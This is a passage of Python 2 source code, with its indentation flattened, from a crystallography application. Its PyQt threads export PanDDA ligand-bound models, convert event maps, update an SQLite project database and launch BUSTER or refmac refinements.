# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
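# Exports ligand-bound PanDDA models: for each dataset with a *-pandda-model.pdb this thread
# converts the matching event map to structure factors, copies the model and event data into
# the project directory, updates the database and launches an initial BUSTER refinement.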
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
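        # modelsDict maps crystal name to the modification timestamp of its pandda model,
        # e.g. {'Protein-x0123': '2017-08-10 10:25:00'} (illustrative crystal name)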
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
            progress_step = 1/float(len(modelsDict))  # divide as floats; integer division would always give 0
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
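            # ligandDict maps each LIG residue identifier to its centre-of-mass (x, y, z) coordinates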
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
            self.Logfile.warning('emapLigandDict: ' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
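        # For every ligand: calculate a map (FWT/PHWT) from the event MTZ, cut it to within 7 A of
        # the ligand and store it as <xtal>_<ligID>_event.ccp4 with a *_event_cut.ccp4 symlink.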
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
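        # Convert each ligand's event map (ccp4) into structure factors at the model resolution;
        # the resulting MTZ is renamed so that each ligand gets its own *_<ligID>.mtz file.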
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
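        # Returns the identifier of the first ligand whose centre of mass lies within 7 A of the
        # PanDDA event coordinates, or None if no ligand is close enough.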
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
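        # Default refinement parameters handed to XChemRefine; SANITY is set to 'off' when the
        # user asked for the 'nocheck' export mode, which presumably skips the sanity checks downstream.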
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
        self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
                self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
            self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                        advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                   'This is most likely because this was done with an older version of XCE. '
                                   'If you really want to export and refine this model, you need to open the database '
                                   'with DB Browser for SQLite (sqlitebrowser.org); then change the RefinementOutcome field '
                                   'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
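# Exports new or updated PanDDA models via pandda.export, imports events and sites from
# pandda_inspect_events.csv / pandda_inspect_sites.csv into the database, and then starts an
# initial refmac refinement of the exported ensemble models.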
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
            self.Logfile.insert('reading pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
                self.Logfile.insert('adding to site_list: ' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
        self.Logfile.insert('done reading pandda_inspect_events.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
            self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
